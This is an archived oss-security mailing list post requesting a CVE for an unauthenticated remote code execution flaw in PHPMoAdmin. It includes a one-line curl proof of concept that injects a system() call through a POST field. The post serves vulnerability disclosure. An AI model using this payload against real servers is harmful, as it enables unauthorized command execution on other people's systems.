Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 4 Mar 2015 09:35:45 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: Pichaya Morimoto <pichaya@...e.org>
Subject: CVE request: PHPMoAdmin Unauthorized Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello MITRE,

Can you assign 2015 CVE identifier for unauthorized remote code execution
vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/>, thanks.

curl "http://example.com/moadmin.php"; -d "object=1;system('id');exit"

Original advisory: http://seclists.org/fulldisclosure/2015/Mar/19

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJU9rXRAAoJECet96ROqnV0RAsP/RfOy2iFTxJKdfhQMQb+EXLZ
IoznODmRYkOeXhyEtr2Fd4I2lX5QUiMNCCN+tyfucOu9oQ7c7L8ihwSYJxtUfseU
nNoo+i3TKsUFqRQ7JOG4BgvPAMKhnUfisRC19Tz1WIrwRZiOl+EOpuiK3ll7zksB
XSSmGJjYCI3//gFeeNJmNpOg3StUVuIxQPKe9krItNRPsJFnpnV/maYxfr6+62el
HsX2eiGmYRIt4RY5YjSTYV06hmEiLv0LdhpH+AwxNopT1e58BY91le3v7Y/kkPl1
UiOHBvo1Pc2u1dIVO2UMUUyAkMIt+2BFmcnf35L1IFtg4kxZ663uIGFXdP0O1oMA
0BAvTYJNrDBWr6sIr0p4yLyq2YAOiUWuL88+sQN47eWRWfxlkIMYrAcWNZziYaiA
32Sm6rAGSET62jLDwUcblGHslZEGyMtDGT+P15R1m8DiQRpShISW0HTj3tzjUqri
5lHNMaZPRSwAxzmQrlAn7/GOM4TjPMSrzYmxGg01piuXvTxqA9tHzItS2cCkBLjq
q5bD/qZ1JrZ6C8QHOHwkGwe2FVK0g3CeqWKhqV4e4JlfMoeQ8CbPcfjamJceHrUp
/ihGZURp4ShdygRUJfSulfTD+YGftqgWfyR5Cp06Iae1hCqkrvvHaXPN1UDNAPaD
gTB3J0Hu3Tub3LkiLvSb
=lxia
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ